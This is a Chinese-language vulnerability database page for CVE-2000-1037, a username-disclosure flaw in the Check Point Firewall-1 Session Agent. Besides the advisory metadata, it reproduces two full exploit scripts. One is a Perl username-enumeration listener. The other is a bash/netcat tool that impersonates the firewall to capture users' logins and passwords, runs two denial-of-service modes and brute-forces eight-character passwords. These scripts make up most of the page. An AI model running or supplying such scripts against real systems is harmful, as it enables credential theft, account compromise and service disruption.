CVE-2000-1037
CVSS7.5
发布时间 :2000-12-11 00:00:00
修订时间 :2008-09-05 16:22:29
NMCOES    

[原文]Check Point Firewall-1 session agent 3.0 through 4.1 generates different error messages for invalid user names versus invalid passwords, which allows remote attackers to determine valid usernames and guess a password via a brute force attack.


[CNNVD]Check Point Firewall-1 Session Agent目录攻击漏洞(CNNVD-200012-078)

        Check Point Firewall-1会话代理端3.0到4.1版本对无效用户名及相对的无效密码产生不同的出错消息。远程攻击者借助强力攻击确定有效用户名并且猜测密码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:checkpoint:firewall-1:4.0Checkpoint Firewall-1 4.0
cpe:/a:checkpoint:firewall-1:4.1Checkpoint Firewall-1 4.1
cpe:/a:checkpoint:firewall-1:3.0Checkpoint Firewall-1 3.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1037
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1037
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-078
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1662
(VENDOR_ADVISORY)  BID  1662
http://www.securityfocus.com/archive/1/76389
(VENDOR_ADVISORY)  BUGTRAQ  20000815 Firewall-1 session agent 3.0 -> 4.1, dictionnary and brute force attack

- 漏洞信息

Check Point Firewall-1 Session Agent目录攻击漏洞
高危 设计错误
2000-12-11 00:00:00 2005-10-20 00:00:00
远程  
        Check Point Firewall-1会话代理端3.0到4.1版本对无效用户名及相对的无效密码产生不同的出错消息。远程攻击者借助强力攻击确定有效用户名并且猜测密码。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (20215)

Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (1) (EDBID:20215)
multiple remote
2000-08-15 Verified
0 Nelson Brito
N/A [点击下载]
source: http://www.securityfocus.com/bid/1662/info

A vulnerability exists in all versions of the Check Point Session Agent, part of Firewall-1. Session Agent works in such a way that the firewall will establish a connection back to the client machine. Upon doing so, it will prompt for a username, and if the username exists, a password. Upon failure, it will reprompt indefinitely. This allows for a simple brute force attack against the username and password.

#!/usr/bin/perl -w
#
# File  :       brute-fw1-agent.pl
# Author:       Nelson Brito<nelson@secunet.com.br || nelson@sekure.org>
#
# Untested code, use on your own risc.
#
use Socket;

$c = 0; $port = 261; #$proto = getprotobyname('tcp');

socket(FAGENT, PF_INET, SOCK_STREAM, getprotobyname("tcp"))     or die
"socket:$!";
setsockopt(FAGENT, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))      or die
"setsockopt: $!";
bind(FAGENT, sockaddr_in($port, INADDR_ANY))                    or die
"bind: $!";
listen(FAGENT, SOMAXCONN)                                       or die
"listen: $!";

open(SDI, "users") or die "open: $!\n";
until(eof(SDI)){
        $user = <SDI>; chomp($user);
        next if ($user=~/^\s*#/);
        next if ($user=~/^\s*$/);
        push @users, $user;
}
close(SDI);

while(accept(MODULE, FAGENT)){
LINE:   $c++;
        print STDOUT "[+] Hii... I'm on TV $c times!\n";
        recv(MODULE, $target, 1024, 0);
        if($target=~/^331/i){
                chomp($users[0]);
                send(MODULE, "$users[0]\n", 0);
                recv(MODULE, $target, 1024, 0);
                if($target=~/^220/){
                        recv(MODULE, $target, 1024, 0);
                        if($target=~/^530/){
                                shift @users; goto LINE;
                        }else{
                                die "[-] Unknow code. What happened?\n";
                        }
                }elsif($target=~/^331/){
                        print STDOUT "[+] The $users[0] username is right!\n";
                }else{
                        die "[-] Uknow return code. What happened?\n";
                }
        }else{
                die "[-] Unknow return code. What happened?\n";
        }

}		

- 漏洞信息 (20216)

Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (2) (EDBID:20216)
multiple remote
2000-10-01 Verified
0 Gregory Duchemin
N/A [点击下载]
source: http://www.securityfocus.com/bid/1662/info
 
A vulnerability exists in all versions of the Check Point Session Agent, part of Firewall-1. Session Agent works in such a way that the firewall will establish a connection back to the client machine. Upon doing so, it will prompt for a username, and if the username exists, a password. Upon failure, it will reprompt indefinitely. This allows for a simple brute force attack against the username and password.


#!/bin/bash
#
# Fwsa (FW-1 session auth), tested on linux 2.4.0 beta
# ( Swiss army knife for FW-1 Session authentication. )
#
# successfully tested against Session Authentication Agents 4.0 & 4.1
# and Firewall-1 module 4.0 
#
# please don't use it for any illegal activity but only for educational purposes
#
#         Gregory Duchemin   ( aka c3rb3r )
# 
#     for help or bug report <==> c3rb3r@hotmail.com

# 0ctober 2000

function Usage()
{
echo
echo " Usage: "$0" Targets_filez  type_of_attack [FQDN name] [dict file] [0/1/2/3]"
echo
echo "================proof of concept // Version 1.0 ==="
echo "==================================================="
echo
echo " Note: Targets_filez is a plaintext file with all IPs to check"
echo "       I recommend u to make it with the help of Nmap "
echo "       Try nmap -T Insane -sS -P0 -p 261 RANGE_IP to look for listening session agents." 
echo " Note: Type of attack is 1 for password recovery, 2 for stupid DOS, 3 for "
echo "       dangerous DOS and 4 for bruteforcing users password on Firewall"
echo
echo "       * password recovery will turn you back user FW1 login/password"
echo "       * stupid DOS just open a connexion and wait for nothing"
echo "         It'll block all other connexion and so, user access."
echo "       * dangerous DOS will enter an infinite loop within it send garbage."
echo "         Will crash some weak systems. ( find wich ones ;) ) "
echo "       * passwords Brute-force try to guess users password onto "
echo "         the corporate firewall. Have to supply an external address in filez"
echo "         to force firewall to connect on local port ( port 261 )."
echo
echo " Note: FQDN name is Fully Qualified Domain name, default:firewall used for FW-1 "
echo " banner."
echo " Note: Change the internal variables filez and logfile to store your stock into, default:\"...\""
echo " Note: this proggy needs netcat to nicely work."
echo 
echo " G00d Hunt !"
echo 
echo " author:  Gregory Duchemin  ( aka c3rb3r )"
echo "                          c3rb3r@hotmail.com "
echo 
echo " N0 c0pyright, feel free to use or modify it as u want"
echo
}

signal_handler()
{
sync
echo 
echo "Warning: target aborted, continuing with next one..."
echo
echo
}


filtered()
{
echo
echo "Error: target port 261 doesn't respond"
echo "       it should be because target is filtering or is down." 
echo "       Anyway, try again spoofing firewall address."
echo "       Arptool should be helpfull to do the job"
echo
}

closed()
{
echo
echo "Error: target port 261 is closed"
echo "       continuing with next ip." 
echo
echo
}

simple_dos()
{
for i in $ip; do 
echo
echo "***********************************************"
echo "Launching stupid DOS attack against "$i" !"
echo "***********************************************"
echo
echo
{
sleep $timeout 
sync
}| nc -n -w 2 -v $i 261 > $logfile 2>&1
if [ `awk '{ print $7 }' $logfile` = "refused" ]; then
closed
else
if [ `awk '{ print $7 }' $logfile` = "timed" ]; then
filtered
fi
fi
done
rm $logfile
echo
echo "DOS terminated. ( Hope it's ok)"
echo
}


dangerous_dos()
{
for i in $ip; do 
echo
echo "****************************************************"
echo "Launching dangerous DOS attack against "$i" !"
echo "****************************************************"
echo
echo
{
sleep $timeout 
cat /dev/random
}| nc -n -w 2 -v $i 261  > $logfile 2>&1
if [ $( awk '{ print $7 }' $logfile) = "refused" ]; then
closed
else 
if [ $(awk '{ print $7 }' $logfile) = "timed" ]; then
filtered
fi
fi
done
rm $logfile
echo
echo "DOS terminated. ( Hope it's ok)"
echo
}


password_recovery()
{
for i in $ip; do 
echo
echo "*****************************************************"
echo "Launching FW1 password recovery against "$i" !"
echo "*****************************************************"
echo
echo
{
sleep $timeout 
sync 
cat /dev/null > $logfile
echo "220 FW-1 Session Authentication Request from "$name
echo "211 253141732 1988 3931424644 80 5"
echo "331 User:"
sync
# synchronisation of buffers and disks  
while [ ! -s $logfile ]; do 
# waiting for user info supply in logfile 
sleep 1
done
user=$(cat $logfile)

echo "331 *Firewall-1 password:"

while [ `wc -l $logfile|awk '{ print $1 }'` -eq 1 ]; do
sleep 1
done
sed 's/'$user'//' $logfile | sed '/./,$!d' > ./tmp
password=$(cat ./tmp)
rm ./tmp
echo "200 User $user authenticated by Firewall-1 authentication."
echo "230 OK"
sleep 2
echo >> $filez
echo >> $filez
echo "===== Password recovery ============================================" >> $filez
echo "====================================================================" >> $filez
echo " Target <==> $i" >> $filez 
echo >> $filez 
echo " Username <==> $user    Password <==> $password" >> $filez
echo >> $filez 
echo >> $filez 
exit 0
}| nc  -n -w 2 -v $i 261  > $logfile
if [ -f ./tmp ]; then
rm tmp
fi
done
if [ -f $logfile ]; then
rm $logfile
fi
echo
echo "Done. ( see "$filez" to read stolen informations)"
echo
}



password_bruteforce()
{
for i in $ip; do 


echo
echo "*****************************************************"
echo "Launching FW1 password BruteForce attack "
echo "*****************************************************"
echo
echo


if [ -s $logfile ]; then
cat /dev/null > $logfile
fi

# We use as many char string as there are in password because
# most of the time, admin won't use a "real" random generator but 
# a program that use a basic scheme.
# if u understand this scheme and modify the string below, u should be able to increase significantly your chances of succeed.  
# if passwords in your company are less than 8 chars, comment useless lines 

# password scheme:
# for instance, first letter could be uppercase ( A or H string depending on order byte ).
# initial values are commented

#A='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
A='A B C D E F G H I J K L M N O P Q R S T U V W X Y Z'

B='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
C='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
D='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
E='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
F='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
G='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
H='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
{
# we send a probe to anywhere in the world port 80 (or whatever fw rules allow), waiting for FW answer 
nc -w 2 -n $i 80 > /dev/null 2>&1

# waiting for invitation caller  
grep 331 $logfile > /dev/null
while [ $? -eq 1 ]; 
do 
grep 331 $logfile > /dev/null
done

# we try now our login names until we get back the magic cookie
# actually we read login names in a file, it should be more efficient since most of admins use real names.
# u can use brute force to guess login in the same manner we use it for passwords.
# in this case, just change the few lines below to use chars strings from 1 up to 8 loops.

for user in $username
do
cat /dev/null > $logfile
sync
echo $user

# 530 eg NOTOK, error response
# fw1 session authentication reply with an error code if username doesn't exist, that's a flaw in itself.

sleep $timeout 

grep 530 $logfile > /dev/null
if [ $? -eq 1 ]; then
echo "===== Password Brute force ============================================" >> $filez
echo "====================================================================" >> $filez
echo >> $filez
echo >> $filez
echo " login ok :"$user >> $filez
echo >> $filez
echo >> $filez
echo $user >> ./.users
sync
continue
fi
done

if [ ! -f ./.users ]; then 
exit
fi

targets=`cat ./.users`
rm ./.users
 
# Now it's time  we try to guess password for this user
# if passwords in your company are less than 8 chars, comment useless loops.


for user in $targets
do
 
for i8 in $H 
do
for i7 in $G
do

# this rule is optional
if [ $i7 = $i8 ]; then
continue
fi

for i6 in $F
do

# this rule is optional
if [ $i6 = $i7 ]; then
continue
fi

for i5 in $E
do

# this rule is optional
if [ $i5 = $i6 ]; then
continue
fi

for i4 in $D 
do

# this rule is optional
if [ $i4 = $i5 ]; then
continue
fi

for i3 in $C
do

# this rule is optional
if [ $i3 = $i4 ]; then
continue
fi

for i2 in $B
do

# this rule is optional
if [ $i2 = $i3 ]; then
continue
fi

for i1 in $A
do

# this rule is optional
if [ $i1 = $i2 ]; then
continue
fi


# waiting for server

grep 331 $logfile > /dev/null
while [ $? -eq 1 ];
do 
grep 331 $logfile > /dev/null
done


# order is fetched by the user (see usage), and may be usefull for multi-process bruteforce.

if [ $order -eq 0 ]; then
echo $i1$i2$i3$i4$i5$i6$i7$i8
# for debugging purpose
echo "trying $i1$i2$i3$i4$i5$i6$i7$i8" >> $filez
else
if [ $order -eq 1 ]; then
echo $i1$i7$i6$i5$i4$i3$i2$i8
echo "trying $i1$i7$i6$i5$i4$i3$i2$i8" >> $filez
else
if [ $order -eq 2 ]; then
echo $i1$i5$i8$i2$i4$i7$i3$i6
echo "trying $i1$i5$i8$i2$i4$i7$i3$i6" >> $filez
else
echo $i1$i2$i4$i7$i8$i3$i6$i5
echo "trying $i1$i2$i4$i7$i8$i3$i6$i5" >> $filez
fi
fi
fi
sync 
usleep $utimeout 

# 230 eg OK, password is correct 

grep 230 $logfile > /dev/null
if [ $? -eq 0 ]; then
echo >> $filez
if [ $order -eq 0 ]; then
echo "password ok :"$i1$i2$i3$i4$i5$i6$i7$i8 >> $filez
else
if [ $order -eq 1 ]; then
echo "password ok :"$i8$i7$i6$i5$i4$i3$i2$i1 >> $filez
else
if [ $order -eq 2 ]; then
echo "password ok :"$i8$i5$i1$i2$i4$i7$i3$i6 >> $filez
else
echo "password ok :"$i2$i1$i4$i7$i8$i3$i6$i5 >> $filez
fi
fi
fi
echo >> $filez
echo >> $filez
exit
fi

# we r supposed to reinject username each time, this one we just discovered
# but connexion is still alive that's the major flaw.

grep 331 $logfile > /dev/null
while [ $? -eq 1 ];
do 
grep 331 $logfile > /dev/null
done

echo $user
done
done
done
done
done
done
done
done

done
}| nc  -n  -l -p 261  > $logfile 2>&1

#if [ -f $logfile ]; then
#rm $logfile
#fi
done
echo
echo "Done. ( see "$filez" to read stolen informations)"
echo
}



if [ $# -lt 2 ]; then
Usage
exit
fi

nc -h  > /dev/null 2>&1
if [ ! $? -eq 1 ]; then
Usage
echo
echo
echo "Error: "$0" needs netcat to properly run, please check u have it in your \$PATH or compile it now."
echo
exit
fi 

if [ ! $2 -eq 1 ] && [ ! $2 -eq 2 ] && [ ! $2 -eq 3 ] && [ ! $2 -eq 4 ]; then
Usage
echo
echo
echo "Error: Value for type of attack is out of range."
echo
exit
fi

if [ ! -s $1 ]; then
Usage
echo
echo
echo "Error: "$0" didn't find your Targets_ip filez."
echo
exit
fi

trap signal_handler SIGINT


ip=`cat $1`


# filez is where results are writen, please change it for your configuration
# don't forget to change this values for every instance of the process, u would like to launch
filez="./......"
logfile="./logfile4"

cat /dev/null > $filez

name="fwl01"

# timeout is connexion timer when waiting for a server response.

timeout=2


# utimeout is pretty important, specifically for brute force attack, lower value means faster loop but if too low, fw reply would be mistaken
# that depends of your network round trip time and average firewall cpu usage.
# try different values first: default 22 millisecond

utimeout=22000

if [ $# -gt 2 ]; then
name=$3
fi
if [ $# -gt 2 ] && [ $2 -eq 4 ]; then
if [ ! -s $3 ]; then
Usage
echo
echo "Error: "$0" didn't find your dict filez or it's empty."
echo
exit
fi
username=`cat $3`
fi

order=0
if [ $# -gt 3 ]; then
order=$4
fi

if [ -f $logfile ]; then
rm -f $logfile
fi

case "$2" in 
1)
   password_recovery
   ;;

2)
  simple_dos
  ;;

3)
  dangerous_dos
  ;;

4)
  password_bruteforce
  if [ -s $filez ]; then
  cat $filez
  fi
  ;;

*)
  exit 1
esac
exit





		

- 漏洞信息

4424
Check Point FireWall-1 Session Agent Account Disclosure
Remote / Network Access Information Disclosure
Loss of Confidentiality Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

Check Point FireWall-1 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a remote attacker attempts to authenticate to the firewall. The session agent will return different error messages for valid verse invalid user names. This allows a remote attacker to quickly verify the existance of a valid account, resulting in a loss of confidentiality.

- 时间线

2000-08-15 Unknow
2000-08-15 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Check Point Firewall-1 Session Agent Dictionary Attack Vulnerability
Design Error 1662
Yes No
2000-08-15 12:00:00 2009-07-11 02:56:00
This vulnerability was posted to the Bugtraq mailing list on August 15, 2000 by gregory duchemin <c3rb3r@hotmail.com>

- 受影响的程序版本

Check Point Software Firewall-1 4.1
Check Point Software Firewall-1 4.0
Check Point Software Firewall-1 3.0

- 漏洞讨论

A vulnerability exists in all versions of the Check Point Session Agent, part of Firewall-1. Session Agent works in such a way that the firewall will establish a connection back to the client machine. Upon doing so, it will prompt for a username, and if the username exists, a password. Upon failure, it will reprompt indefinitely. This allows for a simple brute force attack against the username and password.

- 漏洞利用

Nelson Brito&lt;nelson@secunet.com.br || nelson@sekure.org&gt; provided brute-fw1-agent.pl exploit.
Gregory Duchemin &lt;c3rb3r@hotmail.com&gt; submitted fwsa.sh exploit.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站